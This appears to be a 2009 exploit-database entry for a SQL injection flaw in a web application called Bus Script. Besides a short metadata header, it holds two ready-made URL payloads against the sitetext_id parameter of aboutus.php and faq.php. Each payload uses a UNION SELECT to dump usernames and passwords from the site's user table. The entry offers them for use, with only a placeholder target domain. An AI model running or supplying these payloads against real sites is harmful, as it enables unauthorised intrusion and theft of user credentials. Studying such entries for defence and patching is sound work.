Bus Script (sitetext_id) Remote SQL Injection Vulnerability

2009-09-10T00:00:00
ID 1337DAY-ID-5752
Type zdt
Reporter Mr.SQL
Modified 2009-09-10T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===========================================================
Bus Script (sitetext_id) Remote SQL Injection Vulnerability
===========================================================


###############################################################
###############################################################
##
## Remote SQL Injection Vulnerability ( aboutus.php sitetext_id )
##
## Bus Script
##
## http://www.tourismscripts.com/
##
########################
########################
##
## -[[: ExploiteS :]]-
##
## www.TraGeT.CoM/aboutus.php?sitetext_id=-1'+UNION+SELECT+0,CONCAT_WS(0x3a3a,user_name,password),0+FROM+user/*
## www.TraGeT.CoM/faq.php?sitetext_id=-1'+UNION+SELECT+0,CONCAT_WS(0x3a3a,user_name,password),0+FROM+user/*
##
########################
########################
 


#  0day.today [2018-01-01]  #